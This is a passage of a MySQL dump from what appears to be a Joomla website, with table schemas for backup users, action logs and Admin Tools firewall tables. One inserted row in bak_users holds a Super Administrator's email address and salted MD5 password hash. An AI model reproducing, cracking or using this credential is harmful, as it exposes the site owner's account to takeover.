  `activation` varchar(100) NOT NULL DEFAULT '',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `usertype` (`usertype`),
  KEY `idx_name` (`name`),
  KEY `gid_block` (`gid`,`block`),
  KEY `username` (`username`),
  KEY `email` (`email`)
) ENGINE=MyISAM AUTO_INCREMENT=63 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_users`
--

LOCK TABLES `bak_users` WRITE;
/*!40000 ALTER TABLE `bak_users` DISABLE KEYS */;
INSERT INTO `bak_users` VALUES (62,'Administrator','admin','ekvatorprint@mail.ru','4bfcfbe326c9e1ce13b584c2a4782c3f:lDtQT3gbuZ9lHb63Lr0QtMJyuW4RSLOT','Super Administrator',0,1,25,'2010-11-02 19:44:26','2010-11-02 18:10:39','','');
/*!40000 ALTER TABLE `bak_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_weblinks`
--

DROP TABLE IF EXISTS `bak_weblinks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_weblinks` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `sid` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `url` varchar(250) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `archived` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `catid` (`catid`,`published`,`archived`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_weblinks`
--

LOCK TABLES `bak_weblinks` WRITE;
/*!40000 ALTER TABLE `bak_weblinks` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_weblinks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_action_log_config`
--

DROP TABLE IF EXISTS `j25_action_log_config`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_action_log_config` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `type_title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `type_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `id_holder` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `title_holder` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `table_name` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `text_prefix` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_action_log_config`
--

LOCK TABLES `j25_action_log_config` WRITE;
/*!40000 ALTER TABLE `j25_action_log_config` DISABLE KEYS */;
INSERT INTO `j25_action_log_config` VALUES (1,'article','com_content.article','id','title','#__content','PLG_ACTIONLOG_JOOMLA'),(2,'article','com_content.form','id','title','#__content','PLG_ACTIONLOG_JOOMLA'),(3,'banner','com_banners.banner','id','name','#__banners','PLG_ACTIONLOG_JOOMLA'),(4,'user_note','com_users.note','id','subject','#__user_notes','PLG_ACTIONLOG_JOOMLA'),(5,'media','com_media.file','','name','','PLG_ACTIONLOG_JOOMLA'),(6,'category','com_categories.category','id','title','#__categories','PLG_ACTIONLOG_JOOMLA'),(7,'menu','com_menus.menu','id','title','#__menu_types','PLG_ACTIONLOG_JOOMLA'),(8,'menu_item','com_menus.item','id','title','#__menu','PLG_ACTIONLOG_JOOMLA'),(9,'newsfeed','com_newsfeeds.newsfeed','id','name','#__newsfeeds','PLG_ACTIONLOG_JOOMLA'),(10,'link','com_redirect.link','id','old_url','#__redirect_links','PLG_ACTIONLOG_JOOMLA'),(11,'tag','com_tags.tag','id','title','#__tags','PLG_ACTIONLOG_JOOMLA'),(12,'style','com_templates.style','id','title','#__template_styles','PLG_ACTIONLOG_JOOMLA'),(13,'plugin','com_plugins.plugin','extension_id','name','#__extensions','PLG_ACTIONLOG_JOOMLA'),(14,'component_config','com_config.component','extension_id','name','','PLG_ACTIONLOG_JOOMLA'),(15,'contact','com_contact.contact','id','name','#__contact_details','PLG_ACTIONLOG_JOOMLA'),(16,'module','com_modules.module','id','title','#__modules','PLG_ACTIONLOG_JOOMLA'),(17,'access_level','com_users.level','id','title','#__viewlevels','PLG_ACTIONLOG_JOOMLA'),(18,'banner_client','com_banners.client','id','name','#__banner_clients','PLG_ACTIONLOG_JOOMLA'),(19,'application_config','com_config.application','','name','','PLG_ACTIONLOG_JOOMLA');
/*!40000 ALTER TABLE `j25_action_log_config` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_action_logs`
--

DROP TABLE IF EXISTS `j25_action_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_action_logs` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `message_language_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `log_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `extension` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_id` int(11) NOT NULL DEFAULT '0',
  `item_id` int(11) NOT NULL DEFAULT '0',
  `ip_address` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0.0.0.0',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`),
  KEY `idx_user_id_logdate` (`user_id`,`log_date`),
  KEY `idx_user_id_extension` (`user_id`,`extension`),
  KEY `idx_extension_item_id` (`extension`,`item_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_action_logs`
--

LOCK TABLES `j25_action_logs` WRITE;
/*!40000 ALTER TABLE `j25_action_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_action_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_action_logs_extensions`
--

DROP TABLE IF EXISTS `j25_action_logs_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_action_logs_extensions` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `extension` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_action_logs_extensions`
--

LOCK TABLES `j25_action_logs_extensions` WRITE;
/*!40000 ALTER TABLE `j25_action_logs_extensions` DISABLE KEYS */;
INSERT INTO `j25_action_logs_extensions` VALUES (1,'com_banners'),(2,'com_cache'),(3,'com_categories'),(4,'com_config'),(5,'com_contact'),(6,'com_content'),(7,'com_installer'),(8,'com_media'),(9,'com_menus'),(10,'com_messages'),(11,'com_modules'),(12,'com_newsfeeds'),(13,'com_plugins'),(14,'com_redirect'),(15,'com_tags'),(16,'com_templates'),(17,'com_users'),(18,'com_checkin');
/*!40000 ALTER TABLE `j25_action_logs_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_action_logs_users`
--

DROP TABLE IF EXISTS `j25_action_logs_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_action_logs_users` (
  `user_id` int(11) unsigned NOT NULL,
  `notify` tinyint(1) unsigned NOT NULL,
  `extensions` text COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`user_id`),
  KEY `idx_notify` (`notify`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_action_logs_users`
--

LOCK TABLES `j25_action_logs_users` WRITE;
/*!40000 ALTER TABLE `j25_action_logs_users` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_action_logs_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_acl`
--

DROP TABLE IF EXISTS `j25_admintools_acl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_acl` (
  `user_id` bigint(20) unsigned NOT NULL,
  `permissions` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_acl`
--

LOCK TABLES `j25_admintools_acl` WRITE;
/*!40000 ALTER TABLE `j25_admintools_acl` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_acl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_adminiplist`
--

DROP TABLE IF EXISTS `j25_admintools_adminiplist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_adminiplist` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_adminiplist`
--

LOCK TABLES `j25_admintools_adminiplist` WRITE;
/*!40000 ALTER TABLE `j25_admintools_adminiplist` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_adminiplist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_badwords`
--

DROP TABLE IF EXISTS `j25_admintools_badwords`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_badwords` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `word` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_badwords`
--

LOCK TABLES `j25_admintools_badwords` WRITE;
/*!40000 ALTER TABLE `j25_admintools_badwords` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_badwords` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_cookies`
--

DROP TABLE IF EXISTS `j25_admintools_cookies`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_cookies` (
  `series` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_hash` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `valid_to` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`series`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_cookies`
--

LOCK TABLES `j25_admintools_cookies` WRITE;
/*!40000 ALTER TABLE `j25_admintools_cookies` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_cookies` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_customperms`
--

DROP TABLE IF EXISTS `j25_admintools_customperms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_customperms` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `path` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `perms` varchar(4) COLLATE utf8mb4_unicode_ci DEFAULT '0644',
  UNIQUE KEY `id` (`id`),
  KEY `j25_admintools_customperms_path` (`path`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_customperms`
--

LOCK TABLES `j25_admintools_customperms` WRITE;
/*!40000 ALTER TABLE `j25_admintools_customperms` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_customperms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_filescache`
--

DROP TABLE IF EXISTS `j25_admintools_filescache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_filescache` (
  `admintools_filescache_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `path` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `filedate` int(11) NOT NULL DEFAULT '0',
  `filesize` int(11) NOT NULL DEFAULT '0',
  `data` blob,
  `checksum` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`admintools_filescache_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_filescache`
--

LOCK TABLES `j25_admintools_filescache` WRITE;
/*!40000 ALTER TABLE `j25_admintools_filescache` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_filescache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_ipautoban`
--

DROP TABLE IF EXISTS `j25_admintools_ipautoban`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_ipautoban` (
  `ip` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `reason` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT 'other',
  `until` datetime DEFAULT NULL,
  UNIQUE KEY `j25_admintools_ipautoban_ip` (`ip`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_ipautoban`
--

LOCK TABLES `j25_admintools_ipautoban` WRITE;
/*!40000 ALTER TABLE `j25_admintools_ipautoban` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_ipautoban` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_ipautobanhistory`
--

DROP TABLE IF EXISTS `j25_admintools_ipautobanhistory`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_ipautobanhistory` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `reason` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT 'other',
  `until` datetime DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_ipautobanhistory`
--

LOCK TABLES `j25_admintools_ipautobanhistory` WRITE;
/*!40000 ALTER TABLE `j25_admintools_ipautobanhistory` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_ipautobanhistory` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_ipblock`
--

DROP TABLE IF EXISTS `j25_admintools_ipblock`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_ipblock` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_ipblock`
--

LOCK TABLES `j25_admintools_ipblock` WRITE;
/*!40000 ALTER TABLE `j25_admintools_ipblock` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_ipblock` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_log`
--

DROP TABLE IF EXISTS `j25_admintools_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_log` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `logdate` datetime NOT NULL,
  `ip` varchar(40) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `url` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `reason` enum('other','adminpw','ipwl','ipbl','sqlishield','antispam','wafblacklist','tpone','tmpl','template','muashield','csrfshield','badbehaviour','geoblocking','rfishield','dfishield','uploadshield','xssshield','httpbl','loginfailure','securitycode','external','awayschedule','admindir','sessionshield') COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `extradata` longtext COLLATE utf8mb4_unicode_ci,
  UNIQUE KEY `id` (`id`),
  KEY `j25_admintools_log_logdate_reason` (`logdate`,`reason`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_log`
--

LOCK TABLES `j25_admintools_log` WRITE;
/*!40000 ALTER TABLE `j25_admintools_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_profiles`
--

DROP TABLE IF EXISTS `j25_admintools_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_profiles` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `configuration` longtext COLLATE utf8mb4_unicode_ci,
  `filters` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_profiles`
--

LOCK TABLES `j25_admintools_profiles` WRITE;
/*!40000 ALTER TABLE `j25_admintools_profiles` DISABLE KEYS */;
INSERT INTO `j25_admintools_profiles` VALUES (1,'Default PHP Change Scanner Profile','','');
/*!40000 ALTER TABLE `j25_admintools_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_redirects`
--

DROP TABLE IF EXISTS `j25_admintools_redirects`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_redirects` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `source` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `dest` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `ordering` bigint(20) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `keepurlparams` tinyint(1) NOT NULL DEFAULT '1',
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_redirects`
--

LOCK TABLES `j25_admintools_redirects` WRITE;
/*!40000 ALTER TABLE `j25_admintools_redirects` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_redirects` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_scanalerts`
--

DROP TABLE IF EXISTS `j25_admintools_scanalerts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_scanalerts` (
  `admintools_scanalert_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `path` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `scan_id` bigint(20) NOT NULL DEFAULT '0',
  `diff` longtext COLLATE utf8mb4_unicode_ci,
  `threat_score` int(11) NOT NULL DEFAULT '0',
  `acknowledged` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`admintools_scanalert_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_scanalerts`
--

LOCK TABLES `j25_admintools_scanalerts` WRITE;
/*!40000 ALTER TABLE `j25_admintools_scanalerts` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_scanalerts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_scans`
--

DROP TABLE IF EXISTS `j25_admintools_scans`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_scans` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment` longtext COLLATE utf8mb4_unicode_ci,
  `backupstart` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `backupend` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `status` enum('run','fail','complete') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'run',
  `origin` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'backend',
  `type` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'full',
  `profile_id` bigint(20) NOT NULL DEFAULT '1',
  `archivename` longtext COLLATE utf8mb4_unicode_ci,
  `absolute_path` longtext COLLATE utf8mb4_unicode_ci,
  `multipart` int(11) NOT NULL DEFAULT '0',
  `tag` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `backupid` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `filesexist` tinyint(3) NOT NULL DEFAULT '1',
  `remote_filename` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `total_size` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `idx_fullstatus` (`filesexist`,`status`),
  KEY `idx_stale` (`status`,`origin`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_scans`
--

LOCK TABLES `j25_admintools_scans` WRITE;
/*!40000 ALTER TABLE `j25_admintools_scans` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_scans` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_storage`
--

DROP TABLE IF EXISTS `j25_admintools_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_storage` (
  `key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`key`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_storage`
--

LOCK TABLES `j25_admintools_storage` WRITE;
/*!40000 ALTER TABLE `j25_admintools_storage` DISABLE KEYS */;
INSERT INTO `j25_admintools_storage` VALUES ('cparams','{\"ipworkarounds\":1,\"quickstart\":1}'),('fixperms_stack','{\"folders\":[],\"files\":[],\"total\":0,\"done\":0}');
/*!40000 ALTER TABLE `j25_admintools_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_wafblacklists`
--

DROP TABLE IF EXISTS `j25_admintools_wafblacklists`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_wafblacklists` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `view` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `task` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `query` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `query_type` varchar(1) COLLATE utf8mb4_unicode_ci NOT NULL,
  `query_content` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `verb` varchar(6) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_wafblacklists`
--

LOCK TABLES `j25_admintools_wafblacklists` WRITE;
/*!40000 ALTER TABLE `j25_admintools_wafblacklists` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_wafblacklists` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_wafexceptions`
--

DROP TABLE IF EXISTS `j25_admintools_wafexceptions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_wafexceptions` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `view` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `query` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_wafexceptions`
--

LOCK TABLES `j25_admintools_wafexceptions` WRITE;
/*!40000 ALTER TABLE `j25_admintools_wafexceptions` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_admintools_wafexceptions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_admintools_waftemplates`
--

DROP TABLE IF EXISTS `j25_admintools_waftemplates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_admintools_waftemplates` (
  `admintools_waftemplate_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `reason` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '*',
  `subject` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `template` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `enabled` tinyint(3) NOT NULL DEFAULT '1',
  `email_num` tinyint(3) unsigned NOT NULL,
  `email_numfreq` tinyint(3) unsigned NOT NULL,
  `email_freq` enum('','second','minute','hour','day') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` bigint(20) NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`admintools_waftemplate_id`),
  UNIQUE KEY `j25_admintools_waftemplate_keylang` (`reason`(100),`language`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_admintools_waftemplates`
--

LOCK TABLES `j25_admintools_waftemplates` WRITE;
/*!40000 ALTER TABLE `j25_admintools_waftemplates` DISABLE KEYS */;
